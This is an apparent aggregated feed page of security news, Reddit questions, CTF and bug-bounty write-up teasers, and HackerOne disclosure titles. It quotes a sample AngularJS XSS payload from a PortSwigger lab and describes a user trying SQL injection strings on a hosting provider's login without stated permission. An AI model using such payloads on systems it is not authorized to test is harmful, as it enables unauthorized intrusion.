    Lets get straight to it - I have two questions regarding where to turn on VPN (laptop vs phone) Lets say im at a hotel and would like to hotspot my phone so that I can access the internet using my laptop. Question is, where do i turn on VPN? On my phone or on my laptop? Based on my research, many seem to suggest to turn on VPN on the laptop. My question then, is, what if I would like to browse the internet on my phone? Or do stuff on whatsapp, etc. Must I turn on VPN on my phone for these activities too? submitted by /u/AliveandDrive [link] [comments]
    Is it SQL injection?
    Hey Chief, A friend of mine has set up a website where she used a hosting service, I don't remember its name, The admin login functionality from that hosting service asked for username and password combination, I typed a few SQLi payloads (' or 1=1 kinda stuff) but instead of throwing login password/username incorrect error, it showed pretty unsual error and took pretty long to do so, Is that a sign of SQL based injection? Does that mean the website is likely vulnerable to SQL injection or smtg similar? Please help, because that friend of mine has setup her website for business usage and isn't sure that hosting provider is secure and whatnot. submitted by /u/The_Intellectualist [link] [comments]
    Security automation
    I have been using node-red to automate a couple of daily tasks. for example - enrich alerts with virus total intelligence - test and verify DLP configuration is set up correctly - add IP to block list in AWS WAF - pull metrics from crowd strike to PowerBI for manager report - etc. ​ I am considering writing a blog or sharing in a security talk. Is there anyone interested in this topic? Any good platform to speak about this? submitted by /u/Calm_Scene [link] [comments]
  • Open

    “OSINT Investigations: We know what you did that summer” Notes
    OSINT Investigations: We know what you did that summer by Information Warfare Center is packed with OSINT advice and resources, including… Continue reading on Medium »
    Cybersoc DVLA OSINT writeup
    Following is an OSINT challenge DVLA writeup offered by cybersoc. Continue reading on Medium »
    Wonderland- Tryhackme CTF
    Steps Continue reading on Medium »
    OSINTGRAM
    What is osintgram ? Continue reading on Medium »
    Capture The Talent — Pwn Write-up : Global Pandemic
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52 Continue reading on Medium »
  • Open

    Seeking Freelancer for WeChat Recovery
    Computer Forensics For WeChat - Seeking A Freelancer We need someone who can restore WeChat messages from an iPhone backup. Please contact me privately or details. submitted by /u/P2T-2022 [link] [comments]
    Volatility 3 commands and usage tips to get started with memory forensics. Volatility 3 + plugins make it easy to do advanced memory analysis.
    submitted by /u/DFIRScience [link] [comments]
    Certs
    Any certs you recommend for a cs analyst to get more knowledge and skills in digital forensics? submitted by /u/mooncrestle [link] [comments]
    When carving a file type without a footer, how do I know the range?
    I am doing an assignment, and in the assignment volume, I found a Bitmap header. How do I know the range of the file? My professor said he would go over it but never did submitted by /u/KTthemajicgoat [link] [comments]
  • Open

    Samy Kamkar takes down MySpace
    Greatest Moments in Hacking History: Samy Kamkar Takes Down Myspace — YouTube Continue reading on Medium »
  • Open

    IDOR in "external status check" API leaks data about any status check on the instance
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1372216 - Bounty: $610
    broken authentication (password reset link not expire after use in https://network.tochka.com/sign-up)
    QIWI disclosed a bug submitted by uddeshaya: https://hackerone.com/reports/1401891 - Bounty: $100
    FULL SSRF
    Acronis disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1241149
    Claiming the listing of a non-delivery restaurant through OTP manipulation
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1330529 - Bounty: $3250
    api key exposed in github.com//
    8x8 disclosed a bug submitted by adnanmalikinfo: https://hackerone.com/reports/1454965
  • Open

    Paper HackTheBox Write-Up
    Easy box made by Jin Continue reading on Medium »
    The most underrated tool in bug bounty. (and the filthiest one liner possible)
    One liner tool chains for bug bounty, dependent on one vital tool. Continue reading on Medium »
    SQLi: next level
    you may have seen some SQL injections that exploiting them are not as straightforward as what you see in the ethical hacking courses. like… Continue reading on Medium »
    rDEX Bug Bounty Recap
    Overview Continue reading on StaFi »
    PORTSWIGGER WEB SECURITY - XXE (XML EXTERNAL ENTITY) INJECTION LAB ÇÖZÜMLERİ
    XXE (XML External Entity) Injection, bir saldırganın web uygulama üzerinde XML verilerini enjekte etmesine veya değiştirmesine olanak… Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    My Pentest Log -7-
    Greetings to all from Sergius and Bacchus, Continue reading on Medium »
    2FA Misconfiguration leads to adding any number as 2FA verification
    I was testing 2FA on a website. At first, I tried to bypass 2FA but I was not successful, then I thought of something else. What if I can… Continue reading on Techiepedia »
  • Open

    Operation Cache Pandas
    submitted by /u/dmchell [link] [comments]
    Chasing the Silver Petit Potam to Domain Admin
    submitted by /u/ZephrX112 [link] [comments]
  • Open

    How to Fix the specialadves WordPress Redirect Hack
    Attackers are regularly exploiting vulnerable plugins to compromise WordPress websites and redirect visitors to spam and scam websites. This has been an ongoing campaign for multiple years. Payload domains are regularly swapped out and updated, but the objective remains largely the same: trick unsuspecting users into clicking on malicious links to propagate adware and push bogus advertisements onto victim’s desktops. The most recent variation of this WordPress hack involves the following domain: specialadves[.]com If your website is redirecting visitors to pages that look something like this then your website is likely compromised: In today’s post we will review how to remove the specialadves malware from your WordPress website. Continue reading How to Fix the specialadves WordPress Redirect Hack at Sucuri Blog.
  • Open

    Challenge-3 Weekly Cloud Security Challenge
    submitted by /u/0xdeadbeef0000 [link] [comments]
    Horde Webmail 5.2.22 - Account Takeover via Email
    submitted by /u/monoimpact [link] [comments]
  • Open

    For the females & gay members of reddit...
    Not saying you have to be gay to enjoy good looking men getting off ... Has rick & morty, Mr Robot plus other stuff so not all men getting all hot and sweaty... Mp4's images ect... submitted by /u/xanderTgreat [link] [comments]
    Construction Company or not...
    Not been around for a while but found this one and wanted to share it...yep porn... Look in folders...mp4's submitted by /u/xanderTgreat [link] [comments]
    a bunch of electronic music and samples, still looking through it but there's some fun stuff so far
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-02-22 Review
    设备指纹技术介绍与综述(一) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-22 Review
    设备指纹技术介绍与综述(一) by ourren 更多最新文章,请访问SecWiki
  • Open

    panic: send on closed channel - 채널을 잘 닫자 🕵🏼‍♂️
    고루틴과 채널은 golang에서 가장 핵심적인 기능 중 하나입니다. 다만 꼼꼼하게 체크하고 사용하지 않으면 여러가지 문제들을 만들어낼 수 있습니다. 그 중 하나는 Close된 채널에 값을 전달하는 상황인데요. 이런 경우 Application은 panic으로 종료하게 됩니다. panic: send on closed channel goroutine 1 [running]: main.main() /tmp/sandbox2358964969/prog.go:19 +0xfc 우선 간단한 방법으로 이를 예방할 수 있는데요. 채널에 값을 보내기 전 채널로 아래 safeCheck 함수와 같이 채널의 Close 여부를 체크하고, 결과에 따라서 값의 송신 여부를 결정하면 됩니다.
  • Open

    The cutting-edge conundrum: Why federal agencies can’t compromise on security
    Invicti sat down with Ryan Cote, former CIO for the Department of Transportation, to chat about AppSec in government and how agencies can modernize security. READ MORE
  • Open

    Ethereum/EVM Smart Contract Reverse Engineering & Disassembly
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    国务院发布《国务院办公厅关于加快推进电子证照扩大应用领域和全国互通互认的意见》
    《意见》共计五章十八条,统筹发展和安全,加强电子证照应用全过程规范管理,严格保护商业秘密和个人信息安全,切实筑牢电子证照应用安全防线。
    新型银行木马正通过Google Play商店攻击英国银行用户
    荷兰安全公司Threat Fabric的研究人员发现了一种名为 Xenomorph的新 Android 银行木马,正对欧洲56家银行的用户下手。
    FreeBuf早报 | Meta或因数据难传输而退出欧洲;在线诉讼等司法活动需保护个人隐私
    Meta收到欧盟主要隐私监管机构发来的“修订版”初步决定,有可能影响其向美国传输欧盟用户数据,甚至有可能因此退出欧洲市场。
    管理非人类账户的生命周期以最小化网络攻击
    对于许多组织而言,非人类账户的访问权限通常保持不变。这为网络犯罪分子提供了利用孤立帐户进行未经授权的访问并发起网络攻击的机会。
    数十位 OpenSea 用户 NFT 被盗,损失超 170 万美元
    OpenSea 数十名用户遭受了网络钓鱼攻击,损失了约价值170万美元的NFT。
    安卓用户注意了!黑客利用“一次性”账户开展诈骗
    一个基于僵尸网络的流氓网站关联了数千部受感染的安卓手机,这再次揭露了依托SMS进行账户验证的漏洞。
    3月9日看CIS 2021大会春日版直播,多重福利拿不停!
    3月9日-10日,CIS 2021 Spring·春日版全议题直播将正式开启,福利活动也将提前上线,参与最高可赢取iPhone13!
    炊具巨头Meyer披露了影响员工的网络攻击
    全球第二大炊具分销商Meyer Corporation向美国司法部长办公室披露了影响其数千名员工的数据泄露事件。
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
  • Open

    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...
    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
    译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ 摘要 SentinelLabs 一直在追踪一个与伊朗结盟的攻击者,他们在中东和美国活动。...

  • Open

    Fun ideas for physical pentesting?
    Hey team! So my sec team started a physical security assessment a week ago and its been fun. I got to use the under-the-door tool, tailgate, clone rfid card and bypass motion sensor entrances/exits. I was wondering if you guys had any ideas about what you would do if you had “keys to the kingdom” such as the server room or someones desktop? Edit: grammar submitted by /u/Enes_24 [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Automating a Red Team lab with Packer, Terraform and Ansible
    submitted by /u/nickonos [link] [comments]
    Reading and Writing into Process's Memory
    Get the basic understanding on the remote process memory read and write all by windows 32 API and create your own game hacks. https://tbhaxor.com/reading-and-writing-into-processs-memory/ submitted by /u/tbhaxor [link] [comments]
  • Open

    Comprehensive collection of Bionicle Lego images
    submitted by /u/limb_fed [link] [comments]
    Electronic music and Drum 'n' Bass samples
    http://doa.totallyowns.co.uk/ submitted by /u/CalmWater8439 [link] [comments]
    13 Years of Weird Adult Forum Stuff - Organized by YYMM
    submitted by /u/Rose_Beef [link] [comments]
  • Open

    Command line execution fuzzer and bruteforcer (Equivalent of wfuzz for all command line)
    submitted by /u/cryptaureau [link] [comments]
    Wrote a new blog post on injecting fake credentials into lsass memory using New-HoneyHash and alerting with Elastic.
    submitted by /u/m_edmondson [link] [comments]
    My first vulnerability - Arista gNMI authentication bypass CVE-2021-28500
    submitted by /u/MilesTails [link] [comments]
    Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql
    submitted by /u/toyojuni [link] [comments]
    Find You: Building a stealth AirTag clone
    submitted by /u/breakingsystems [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Plone Scanner Version 0.01
    submitted by /u/halencarjunior [link] [comments]
    nrich: a new tool to quickly find open ports and vulnerabilities via Shodan
    submitted by /u/0xdea [link] [comments]
    Linux kernel NFC Use-After-Free (CVE-2021-23134) PoC
    submitted by /u/awarau888 [link] [comments]
  • Open

    Healing blind injections
    What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones? Continue reading on Medium »
    eCPTX Exam Review by 0xJin
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on Medium »
    What an injection into jQuery-selector can lead to
    ​I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly). Continue reading on Medium »
    XSS in hidden input field
    Hello again! I’m faizan and today I’m writing about an XSS I found in an input field which was hidden from the page using Content division… Continue reading on Medium »
    Parameter Tampering
    First, What is the Parameter Tampering? Continue reading on Medium »
    How I found broken link hijack using Python
    Disclaimer Continue reading on Medium »
    How I could’ve bypassed the 2FA security of Instagram once again?
    … Continue reading on InfoSec Write-ups »
    Attacking Kerberos | Kerberoasting | AS-REP Roasting | Active Directory | Windows |
    This blog covers how to attack Kerberos with Kerberoasting and AS-REP Roasting attacks. Continue reading on System Weakness »
    Polygon Consensus Bypass Bugfix Review
    Summary Continue reading on Immunefi »
  • Open

    I was solving an XSS lab on portswigger when I came across this js payload could anyone please explain me how it works [ {{$on.constructor('alert(1)')()}} ]
    Here is the link to the lab : https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression submitted by /u/_JatinChopra_ [link] [comments]
    Are there any sites with clear information about specific CVEs and how they can be exploited?
    It seems a lot of these sites that I am finding are very vague about the different vulnerabilities. It would be helpful to find a place where I can search the CVE and they can tell me how it is vulnerable and how it can be exploited. submitted by /u/Ok-Oil2953 [link] [comments]
    How are you tracking and documenting SIEM use cases?
    Curious to see what solutions folks have for documenting and tracking SIEM use cases. Are you just throwing everything into a spreadsheet? Using a KB tool like Confluence? Do you have a formalized process for handling changes to rules or retiring them? submitted by /u/wowneatlookatthat [link] [comments]
    SSH: Which server gets which keys to work?
    Sorry if this is a bit of a basic question but I’m setting up my first headless server and could use your advice. I have a server which I’d like to access via SSH. I have created a password protected key file to do so. I will be accessing the server from a few different clients, all belonging to me and no-one else. Is it correct to only have the public key on the server, and to have both the private and public keys on the clients? Or does the server need the private key? Is it even possible for the client to work without both the public and private keys available to it…? submitted by /u/JamieOvechkin [link] [comments]
    Common security-centric query languages?
    I'm working on a personal project relating to security-centric query languages, and I'm trying to get an overview of current (popular) languages. So far, I've got: Splunk Search Processing Language Falcon Query Language Microsoft Kusto Rapid7 Log Entry Query Language Are there other major languages in use currently? submitted by /u/QuirkySpiceBush [link] [comments]
    Receiving OTPs and verification links for different websites from the same number
    Hi all, I recently noticed that i am getting the OTPs/reset links for different websites (such as Instagram and Amazon) from the same number. That is the password reset link for instagram was sent to my phone from the same number as the verification link for amazon. The number is something like 78549659. Is this normal or does each company have a different number for sending such texts? submitted by /u/Euphoric_Asparagus90 [link] [comments]
    SANS SEC522 vs SEC542
    Hey everyone. My employer is paying for me to do a SANS certificate of my choosing, I'm interested in the web/appsec based certs. I was wondering if anyone's taken either of these or would recommend one over the other. Thanks submitted by /u/n3v327311 [link] [comments]
  • Open

    How dangerous is being a digital forensic investigator?
    I am currently doing BSc in Information systems and want to do masters in digital/computer forensics. submitted by /u/SkillKiller3010 [link] [comments]
    Why do some investigations take longer and some shorter?
    I often read in news articles that some suspects have been arrested for internet crimes that take “months long investigation”. Why does it take months long if they already have so called evidence especially if they have received tips on it from organizations such as NCMEC submitted by /u/Ill-Date-1852 [link] [comments]
    Fargate incident response
    How do we isolate affected containers for AWS ECS/EKS in fargate? Creating a new security group for ECS will result in new tasks being recreated to replace the old tasks, so the affected tasks won't be preserved. In EKS, there is no visibility into the security groups of the node. The only way to isolate is through the ACL which is not very ideal as there may be other apps using the same ACL. submitted by /u/SnooKiwis8248 [link] [comments]
    For research - breaking into Computer/Digital Forensics?
    Hey all - hope you're doing well. Doing some research on the Computer/Digital forensics field for a friend - I've looked a bit across Google, postings on job sites, etc. but wanted to get some knowledge from this pretty extensive community! How would someone with an M.A. (Masters) break into Computer or Digital forensics? Is a certification or class worth it (i.e. classes on Udemy, Coursera for specializations, or a university/online bootcamp program on digital or computer based forensics) What is your day-to-day like, how did you get into the field/how do you like it? What are common tools and skills - how much of a technical or IT background is required? Thank you! submitted by /u/sora1493 [link] [comments]
  • Open

    An Accidental SSRF Honeypot in Google Calendar
    This is a story of what both I and Google engineers considered to be an SSRF vulnerability in Google Calendar — but turned out to be some… Continue reading on Medium »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on ITNEXT »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on Medium »
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki周刊(第416期) by ourren 漏洞可用性交流(VEX)介绍 by ourren PAM 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki周刊(第416期) by ourren 漏洞可用性交流(VEX)介绍 by ourren PAM 2022 论文录用列表 by ourren 更多最新文章,请访问SecWiki
  • Open

    OWASP-LPU CTF: OSINT
    Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 14
    And here we go to Hacktoria’s geolocation number 14 challenge! They keep on coming and I keep on solving them. So without further ado… Continue reading on Medium »
    Never Forget The Moon — OSINT Challenge 18
    On Dec 28, 2021, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »
    Capture The Talent — OSINT Write-ups
    Du samedi 19 au dimanche 20 février 2022, s’est déroulé le CTF de Capture The Talent. 🏆Classement final: 1/52 Continue reading on Medium »
  • Open

    De-anonymize anonymous tips through the Tumblr blog network
    Automattic disclosed a bug submitted by ajoekerr: https://hackerone.com/reports/1484168 - Bounty: $450
    Remote memory disclosure vulnerability in libcurl on 64 Bit Windows
    curl disclosed a bug submitted by nsq11: https://hackerone.com/reports/1444539
    Page has a link to google drive which has logos and a few customer phone recordings
    Zomato disclosed a bug submitted by codersanjay: https://hackerone.com/reports/864712 - Bounty: $200
  • Open

    AntiFuzz: Impeding Fuzzing Audits of Binary Executables
    Article URL: https://neverworkintheory.org/2022/02/21/antifuzz.html Comments URL: https://news.ycombinator.com/item?id=30414501 Points: 9 # Comments: 1
  • Open

    FreeBuf早报 | 豆瓣被爆APP内截图含个人敏感信息;攻击者通过NFT话题分发木马
    豆瓣网被爆出在页面中使用难以察觉的隐形水印,水印的信息包括用户 UID、TID 及带时区的完整时间。
    华云安·ASM技术篇:应对零日攻击的检测模型(VEAM)
    2021年至少发现66个仍在使用中的零日漏洞,数量约是2020年的两倍。
    英国Monzo数字银行用户正受网络钓鱼威胁
    英国数字银行平台Monzo正成为钓鱼攻击的目标,用户收到了含有钓鱼链接的短信。
    价值数百万美元的NFT在攻击中被盗、谷歌向全球32亿用户发出紧急警告|2月21日全球网络安全热点
    2月21日全球网络安全热点。
    最新报告|深信服2021勒索病毒态势报告
    最新报告出炉!
    白宫将乌克兰DDoS攻击锁定在俄罗斯GRU黑客身上
    近期乌克兰发生的DDoS攻击,被指是俄罗斯主导的黑客攻击。
  • Open

    Linux Kernel Use-After-Free (CVE-2021-23134) PoC
    Article URL: https://ruia-ruia.github.io/NFC-UAF/ Comments URL: https://news.ycombinator.com/item?id=30413955 Points: 1 # Comments: 0
  • Open

    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
  • Open

    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    数据库连接利用工具--Sylas
    作者:ryze@nop 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 0x00 前言 起因是在某红队项目中,获取到Oracle数据库密码后,利用Github上的某数据库利用工具连接后,利用时执行如 tasklist /svc 、net user 等命令时出现 ORA-24345: 出现截断或空读取错误,且文件管理功...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
    Oracle WebLogic CVE-2022-21350 漏洞分析
    作者:墨云科技 VLab Team 原文链接:https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ 漏洞简述 这是一个反序列化漏洞,是一条新的gadget,在低版本的JDK中可能会造成RCE风险。 漏洞分析 测试环境weblogic14c版本,测试JDK 1.8版本。 首先会调用BadAttributeValueExpException.read...
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send a Email to me and get kicked out of Google Groups !!
    No content preview
  • Open

    使用动态时间规整 (DTW) 解决时间序列相似性度量及河流上下游污染浓度相似性识别分析 - 鸣梦
    时间序列相似性度量方法 时间序列相似性度量常用方法为欧氏距离ED(Euclidean distance)和动态时间规整DTW(Dynamic Time Warping)。总体被分为两类: 锁步度量(lock-step measures) 和弹性度量(elastic measures) 。锁步度量是时  ( 1 min )
    在线pdf请你谨慎打开 - 踩刀诗人
    本篇其实算之前安全整改话题的一点补充,对之前内容感兴趣的可以走以下快捷通道: 安全漏洞整改系列(二) 安全漏洞整改系列(一) 背景 前不久某家客户对我们提供的系统又进行了一轮安全测试,其中有一条我觉得很有意思,也算是刷新了我的认知,那就是“pdf预览存在xss注入”,在此跟大家分享一波,也算是相互提
    CTO(技术总监)平时都在做些什么? - 程序员守护石
    ​目前创业,最后一家公司任职医疗科技公司的研发中心总经理,之前也在几家公司的任职研发/技术总监岗位,在我理解的范围,目前国内中小企业对于CTO/技术总监的岗位区别没有那么明确的职能区分。 1. 先总结 我先概要性总结一下CTO/技术总监的作用: ❶ CTO/技术总监应具有企业技术方向的整体把控力,也
    看SparkSql如何支撑企业数仓 - 字节跳动数据平台
    企业级数仓架构设计与选型的时候需要从开发的便利性、生态、解耦程度、性能、 安全这几个纬度思考。本文作者:惊帆 来自于数据平台 EMR 团队 前言 Apache Hive 经过多年的发展,目前基本已经成了业界构建超大规模数据仓库的事实标准和数据处理工具,Hive 已经不单单是一个技术组件,而是一种设计  ( 4 min )
    微信一面:什么是一致性哈希?用在什么场景?解决了什么问题? - 小林coding
    大家好,我是小林。 在逛牛客网的面经的时候,发现有位同学在面微信的时候,被问到这个问题: 第一个问题就是:一致性哈希是什么,使用场景,解决了什么问题? 这个问题还挺有意思的,所以今天就来聊聊这个。 发车! 如何分配请求? 大多数网站背后肯定不是只有一台服务器提供服务,因为单机的并发量和数据量都是有限  ( 1 min )
    如何在 Flutter 中集成华为云函数服务 - 华为开发者论坛
    介绍 云函数是一项 Serverless 计算服务,提供 FaaS(Function as a Service)能力,可以帮助开发者大幅简化应用开发与运维相关事务,降低应用功能的实现门槛,快速构建业务能力。下面将介绍如何在 Flutter 框架下集成云函数。 集成步骤 1. 安装 flutter 环  ( 1 min )
    JVM基础学习(二):内存分配策略与垃圾收集技术 - Huangzzzzz
    Java与C++之间有一堵由内存动态分配和垃圾收集技术所围成的高墙,墙外面的人想进去,墙里面的人却想出来 垃圾收集概述 Java内存模型中的堆和方法区是垃圾收集技术所需要关注的终点,因为其他的区域会跟随线程的结束而自动回收。 而需要解决垃圾收集的首要目标便是解决如何判断一个对象已经不需要了从而自动进
    【曹工杂谈】Mysql-Connector-Java时区问题的一点理解--写入数据库的时间总是晚13小时问题 - 三国梦回
    背景 去年写了一篇“【曹工杂谈】Mysql客户端上,时间为啥和本地差了整整13个小时,就离谱 ”,结果最近还真就用上了。 不是我用上,是组内一位同事,他也是这样:有个服务往数据库insert记录,记录里有时间,比如时间A。然后写进数据库后,数据库里的时间是A-13,晚了13小时。然后就改了这么个地方  ( 1 min )
    『无为则无心』Python基础 — 44、对文件和文件夹的操作 - 繁华似锦Fighting
    1、os模块介绍 os模块提供了多数操作系统的功能接口函数。当os模块被导入后,它会自适应于不同的操作系统平台,根据不同的平台进行相应的操作。 在Python编程时,os模块可以处理文件和目录这些我们日常手动需要做的操作,例如:显示当前目录下所有文件、删除某个文件、获取文件大小等等。 在Python  ( 1 min )
    疑难杂症:运用 transform 导致文本模糊的现象探究 - ChokCoco
    在我们的页面中,经常会出现这样的问题,一块区域内的文本或者边框,在展示的时候,变得特别的模糊,如下(数据经过脱敏处理): 正常而言,应该是这样的: emmm,可能大图不是很明显,我们取一细节对比,就非常直观了: 何时触发这种现象? 那么?什么时候会触发这种问题呢?在 Google 上,其实我们能搜到  ( 1 min )
    LibOpenCM3(一) Linux下命令行开发环境配置 - Milton
    LibOpenCM3 是GPL协议(LGPL3)的Cortex-M系列的固件库, 支持stm32、atmel、nxp系列单片机. 这个固件库对标的是 CMSIS, 但是比 CMSIS 提供更多的方法接口, 实现度介于 CMSIS 和 SPL 之间. 对于常见的 STM32F1 系列, 代码已经基本稳...  ( 3 min )
    VS Code开发TypeScript - 寻找无名的特质
    本文概要介绍使用VS Code开发TypeScript的过程。  ( 1 min )
    Spring中的Environment外部化配置管理详解 - 跟着Mic学架构
    Environment的中文意思是环境,它表示整个spring应用运行时的环境信息,它包含两个关键因素 profiles properties profiles profiles这个概念相信大家都已经理解了,最常见的就是不同环境下,决定当前spring容器中的不同配置上下文的解决方案。比如针对开发环  ( 1 min )
    从零开始, 开发一个 Web Office 套件(4):新的问题—— z-index - 赵康
    《从零开始, 开发一个 Web Office 套件》系列博客目录 这是一个系列博客, 最终目的是要做一个基于HTML Canvas 的, 类似于微软 Office 的 Web Office 套件, 包括: 文档, 表格, 幻灯片... 等等. 对应的Github repo 地址: https://g  ( 1 min )
    vivo 服务端监控架构设计与实践 - vivo互联网技术
    一、业务背景 当今时代处在信息大爆发的时代,信息借助互联网的潮流在全球自由的流动,产生了各式各样的平台系统和软件系统,越来越多的业务也会导致系统的复杂性。 当核心业务出现了问题影响用户体验,开发人员没有及时发现,发现问题时已经为时已晚,又或者当服务器的CPU持续增高,磁盘空间被打满等,需要运维人员及  ( 1 min )
    通过Dapr实现一个简单的基于.net的微服务电商系统(十九)——分布式事务之Saga模式 - a1010
    在之前的系列文章中聊过分布式事务的一种实现方案,即通过在集群中暴露actor服务来实现分布式事务的本地原子化。但是actor服务本身有其特殊性,场景上并不通用。所以今天来讲讲分布式事务实现方案之saga模式,并在文后附上代码供各位读者参考,评论。 目录:一、通过Dapr实现一个简单的基于.net的微  ( 1 min )
    上周热点回顾(2.14-2.20) - 博客园团队
    热点随笔: · 2021年度总结 | 葡萄城软件开发技术回顾(下) (葡萄城技术团队)· 从MVC到DDD的架构演进 (木小丰)· 3.6 万颗星!开源 Web 服务器后起之秀,自带免费 HTTPS 开箱即用 (削微寒)· ASP.NET Core 6框架揭秘实例演示[01]: 编程初体验 (Art
    私有化轻量级持续集成部署方案--04-私有代码仓库服务-Gitea - 莫问今朝乄
